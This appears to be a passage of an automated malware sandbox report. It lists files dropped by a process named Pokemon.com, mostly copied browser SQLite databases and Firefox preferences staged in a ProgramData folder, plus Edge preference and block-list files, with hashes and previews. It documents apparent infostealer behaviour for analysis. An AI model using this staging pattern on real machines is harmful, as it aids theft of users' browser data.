                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\890R90

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                    MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                    SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                    SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                    SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\AS26FU

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                    MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                    SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                    SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                    SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\EKNG4E

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\IEUAAIW47

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):51200
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\K6XB16

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.265343899664204
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVum0:Bq+n0JX9ELyKOMq+8y9/Owr
                                                                                                                                                                                                                                                                                    MD5:30F72208E8643B2A6F79AA94A1576084
                                                                                                                                                                                                                                                                                    SHA1:082D95A9E8C064A535B0F0AC8E8E1200A4B3E4C1
                                                                                                                                                                                                                                                                                    SHA-256:D9D596EA9F42475B8D92381C33616E86D1C43A50D734EBE2A5035063B72F2D26
                                                                                                                                                                                                                                                                                    SHA-512:728C8D718351ADEC4205072BB2FB63781C8FA848F8DC35930F931AF236084ABD4BA788DE59C060114391CD1AD6F179FE42087F9F11DFA48010CDDAA243EAA9FF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\L68GDB

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\N7YMYCBSR

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\79RQ1VS0ZU3E\WLFCTJ

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\00719419-fb4e-4388-bcaa-c1b7a86018b1.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1e68dc0f-e9e2-40c1-8395-955c62cacc9e.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45886
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08783521658406
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:WMkbJrT8IeQc5d9IlKushDO6vP6O2cwAI16Lrf6YPAIf9N2aPiCAoYGoup1Xl3jn:WMk1rT8H19IF6W698aPiRoYhu3VlXr4y
                                                                                                                                                                                                                                                                                    MD5:B4ECF5A60F8C43F197E706519F56E3C0
                                                                                                                                                                                                                                                                                    SHA1:13CC7C7E943FDE5C0D3231B9AB39C574FDF67B9D
                                                                                                                                                                                                                                                                                    SHA-256:746598CB2253911E9C5AB66C9AEA7E4290CEB6CB1F55D45301101E3538D21CE1
                                                                                                                                                                                                                                                                                    SHA-512:DBB90CA72B89BEFD856F45348F1EA2B7717C59F22A0C72D9AC146A7A91326676C893258725DE388C4790F28974E55B1840B36495D8888AE844156173AE017A62
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735307236"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\6061b203-9e38-45b1-8b71-1da3496d8b22.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):44608
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096343830118719
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB3wufhDO6vP6O2cwAI16XidTyFBcF/BcGoup1Xl34:z/Ps+wsI7ynE+6W7chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:E29C801BEC9FC55B4C63775DBA84A2F3
                                                                                                                                                                                                                                                                                    SHA1:B9AC34D344D862252478DBC803CE801850612EEA
                                                                                                                                                                                                                                                                                    SHA-256:F33B79390DA52EE9A4E9F80973C01A56163ED100386AB4CA2E6568CA389E82F1
                                                                                                                                                                                                                                                                                    SHA-512:5D7A5BD4307298901BE844DF9063A198861C52D05E3C06D6C5AC8C3D4253CD3E42B3D045B74E369F65D322322CBAE77AFC2F7088901A7CFDF966B4095D0E7222
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\6250ba0c-6a30-467f-bf83-6eb6e9ce6854.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                    MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                    SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                    SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                    SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                    MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                    SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                    SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                    SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676EAFDF-448.pma

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4353163477645988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:ZREKu9KcOWSdQq6Dm1vkcAcKnflb/BDpgJiqUfJBq0x/V2eg1HFul:YKuQ3UDmpkcAZfl/R2JyfJBqwV2eaHE
                                                                                                                                                                                                                                                                                    MD5:96E56C382D1B76B6CB6D990B527C646B
                                                                                                                                                                                                                                                                                    SHA1:421A6A9F09A68A0792340E4A63DEE19C07C6DC8B
                                                                                                                                                                                                                                                                                    SHA-256:23F16D77FF6E108ED804FC2F6BF6C21F6A3268EA9AA5AE8D0C0D00CBFD41E20E
                                                                                                                                                                                                                                                                                    SHA-512:31996169700974D5CD174AAE7015254D1E012DC8F517637E67C0F4508D23E208512A09D75B5F8B7DFC744C200BBAE880AD5DB7A42D2791A3E5190CFFAC2AA583
                                                                                                                                                                                                                                                                                    Malicious:false
